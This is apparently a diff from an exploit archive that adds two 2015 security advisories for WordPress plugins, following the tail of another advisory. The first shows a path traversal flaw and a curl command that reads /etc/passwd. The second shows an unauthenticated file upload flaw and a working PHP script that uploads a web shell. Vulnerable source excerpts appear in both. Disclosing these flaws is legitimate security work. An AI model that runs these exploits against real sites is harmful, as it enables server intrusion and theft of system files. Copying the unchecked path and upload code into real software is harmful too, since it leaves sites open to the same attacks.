from_email
|
||||||
|
title
|
||||||
|
connector$url
|
||||||
|
|
||||||
|
|
||||||
|
Affected Area(s): [+] /system/users
|
||||||
|
/system/profile
|
||||||
|
/system/content_edit/
|
||||||
|
|
||||||
|
===============================================================
|
||||||
|
|
||||||
|
[+] Disclaimer
|
||||||
|
Permission is hereby granted for the redistribution of this advisory,
|
||||||
|
provided that it is not altered except by reformatting it, and that due
|
||||||
|
credit is given. Permission is explicitly given for insertion in
|
||||||
|
vulnerability databases and similar, provided that due credit is given to
|
||||||
|
the author. The author is not responsible for any misuse of the information
|
||||||
|
contained herein and prohibits any malicious use of all security related
|
||||||
|
information or exploits by the author or elsewhere.
|
||||||
|
|
||||||
|
|
||||||
|
(hyp3rlinx)
|
53
platforms/php/webapps/37274.txt
Executable file
53
platforms/php/webapps/37274.txt
Executable file
|
@ -0,0 +1,53 @@
|
||||||
|
Title: Path Traversal vulnerability in Wordpress plugin se-html5-album-audio-player v1.1.0
|
||||||
|
Author: Larry W. Cashdollar, @_larry0
|
||||||
|
Date: 2015-06-06
|
||||||
|
Advisory: http://www.vapid.dhs.org/advisory.php?v=124
|
||||||
|
Download Site: https://wordpress.org/plugins/se-html5-album-audio-player/
|
||||||
|
Vendor: https://profiles.wordpress.org/sedevelops/
|
||||||
|
Vendor Notified: 2015-06-06
|
||||||
|
Vendor Contact: https://profiles.wordpress.org/sedevelops/
|
||||||
|
Description:
|
||||||
|
An HTML5 Album Audio Player. A plugin to archive, present, and play collections of mp3s (or other html5 audio formats) as albums within your post.
|
||||||
|
|
||||||
|
Vulnerability:
|
||||||
|
The se-html5-album-audio-player v1.1.0 plugin for wordpress has a remote file download vulnerability. The download_audio.php file does not correctly check the file path, it only attempts to check if the path is in /wp-content/uploads which is easily defeated with ../.
|
||||||
|
|
||||||
|
This vulnerability doesn’t require authentication to the Wordpress site.
|
||||||
|
|
||||||
|
File ./se-html5-album-audio-player/download_audio.php:
|
||||||
|
|
||||||
|
3 $file_name = $_SERVER['DOCUMENT_ROOT'] . $_GET['file'];
|
||||||
|
4 $is_in_uploads_dir = strpos($file_name, '/wp-content/uploads/');
|
||||||
|
5 // make sure it's a file before doing anything!
|
||||||
|
6 if( is_file($file_name) && $is_in_uploads_dir !== false ) {
|
||||||
|
7
|
||||||
|
8 // required for IE
|
||||||
|
9 if(ini_get('zlib.output_compression')) { ini_set('zlib.output_compression', 'Off'); }
|
||||||
|
10
|
||||||
|
11 // get the file mime type using the file extension
|
||||||
|
12 switch(strtolower(substr(strrchr($file_name, '.'), 1))) {
|
||||||
|
13 case 'pdf': $mime = 'application/pdf'; break;
|
||||||
|
14 case 'zip': $mime = 'application/zip'; break;
|
||||||
|
15 case 'jpeg':
|
||||||
|
16 case 'jpg': $mime = 'image/jpg'; break;
|
||||||
|
17 default: $mime = 'application/force-download';
|
||||||
|
18 }
|
||||||
|
19 header('Pragma: public'); // required
|
||||||
|
20 header('Expires: 0'); // no cache
|
||||||
|
21 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
|
||||||
|
22 header('Last-Modified: '.gmdate ('D, d M Y H:i:s', filemtime ($file_name)).' GMT');
|
||||||
|
23 header('Cache-Control: private',false);
|
||||||
|
24 header('Content-Type: '.$mime);
|
||||||
|
25 header('Content-Disposition: attachment; filename="'.basename($file_name).'"');
|
||||||
|
26 header('Content-Transfer-Encoding: binary');
|
||||||
|
27 header('Content-Length: '.filesize($file_name)); // provide file size
|
||||||
|
28 header('Connection: close');
|
||||||
|
29 readfile($file_name); // push it out
|
||||||
|
30 exit();
|
||||||
|
|
||||||
|
The above code does not verify if a user is logged in, and do proper sanity checking if the file is outside of the uploads directory.
|
||||||
|
|
||||||
|
CVEID: 2015-4414
|
||||||
|
OSVDB:
|
||||||
|
Exploit Code:
|
||||||
|
• $ curl http://server/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd
|
87
platforms/php/webapps/37275.txt
Executable file
87
platforms/php/webapps/37275.txt
Executable file
|
@ -0,0 +1,87 @@
|
||||||
|
Title: Remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms v3.0beta Wordpress plugin
|
||||||
|
Author: Larry W. Cashdollar, @_larry0
|
||||||
|
Date: 2015-06-07
|
||||||
|
Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
|
||||||
|
Vendor: Waters Edge Web Design and NetherWorks LLC
|
||||||
|
Vendor Notified: 2015-06-08
|
||||||
|
Advisory: http://www.vapid.dhs.org/advisory.php?v=125
|
||||||
|
Vendor Contact: plugins@wordpress.org
|
||||||
|
Description: A plugin that integrates the awesome Adobe Creative SDK (formerly Aviary) Photo / Image Editor with the Gravity Forms Plugin.
|
||||||
|
Vulnerability:
|
||||||
|
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system. Including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.
|
||||||
|
|
||||||
|
In the file aviary-image-editor-add-on-for-gravity-forms/includes/upload.php the code doesn’t check for an authenticated Wordpress user:
|
||||||
|
|
||||||
|
1 <?php
|
||||||
|
2
|
||||||
|
3 $filename = $_SERVER["DOCUMENT_ROOT"]."/wp-load.php";
|
||||||
|
4 if (file_exists($filename)) {
|
||||||
|
5 include_once($filename);
|
||||||
|
6 } else {
|
||||||
|
7 include_once("../../../../wp-load.php");
|
||||||
|
8 }
|
||||||
|
9 echo "Here";
|
||||||
|
10 $image_file = $_FILES['gf_aviary_file'];
|
||||||
|
11 if($image_file['name']!=''){
|
||||||
|
12 $max_file_size = 4*1024*1024;
|
||||||
|
13 $file_size = intval($image_file['size']);
|
||||||
|
14 if( $file_size > $max_file_size ){
|
||||||
|
15 $msg = "File Size is too big.";
|
||||||
|
16 $error_flag = true;
|
||||||
|
17 }
|
||||||
|
18 $extension = strtolower(end(explode('.', $image_file['name'])));
|
||||||
|
19 $aa_options = get_option('gf_aa_options');
|
||||||
|
20 $supported_files = $aa_options['supported_file_format'];
|
||||||
|
21 $supported_files = strtolower($supported_files);
|
||||||
|
22 if(!$error_flag && $supported_files != '' ){
|
||||||
|
23 $supported_files = explode (',', $supported_files);
|
||||||
|
24 if(!in_array($extension, $supported_files)){
|
||||||
|
25 $msg = "No Supported file.";
|
||||||
|
26 $error_flag = true;
|
||||||
|
27 }
|
||||||
|
28 }
|
||||||
|
29 if(!$error_flag){
|
||||||
|
30 $wp_upload_dir = wp_upload_dir();
|
||||||
|
31 if(!is_dir($wp_upload_dir['basedir'].'/gform_aviary')){
|
||||||
|
32 mkdir($wp_upload_dir['basedir'].'/gform_aviary');
|
||||||
|
33 }
|
||||||
|
34 $upload_dir = $wp_upload_dir['basedir'].'/gform_aviary/';
|
||||||
|
35 $upload_url = $wp_upload_dir['baseurl'].'/gform_aviary/';
|
||||||
|
36 $file_name = $upload_dir.$_POST['gf_aviary_field_id'].'_'.$image_file['name' ];
|
||||||
|
37 if(move_uploaded_file($image_file['tmp_name'], $file_name)){
|
||||||
|
38 $file_url = $upload_url.$_POST['gf_aviary_field_id'].'_'.$image_file['na me'];
|
||||||
|
39 }
|
||||||
|
40 }
|
||||||
|
41 $return_obj = array('status' => 'success', 'message' => $file_url);
|
||||||
|
42 echo json_encode($return_obj);
|
||||||
|
43 }
|
||||||
|
44 ?>
|
||||||
|
|
||||||
|
CVEID: 2015-4455
|
||||||
|
OSVDB:
|
||||||
|
Exploit Code:
|
||||||
|
<?php
|
||||||
|
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
|
||||||
|
/*Larry W. Cashdollar @_larry0
|
||||||
|
6/7/2015
|
||||||
|
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
|
||||||
|
*/
|
||||||
|
|
||||||
|
|
||||||
|
$target_url = 'http://server/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
|
||||||
|
$file_name_with_full_path = '/var/www/shell.php';
|
||||||
|
|
||||||
|
echo "POST to $target_url $file_name_with_full_path";
|
||||||
|
$post = array('name' => 'shell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
|
||||||
|
|
||||||
|
$ch = curl_init();
|
||||||
|
curl_setopt($ch, CURLOPT_URL,$target_url);
|
||||||
|
curl_setopt($ch, CURLOPT_POST,1);
|
||||||
|
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
|
||||||
|
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
|
||||||
|
$result=curl_exec ($ch);
|
||||||
|
curl_close ($ch);
|
||||||
|
echo "<hr>";
|
||||||
|
echo $result;
|
||||||
|
echo "<hr>";
|
||||||
|
?>
|
Loading…
Add table
Reference in a new issue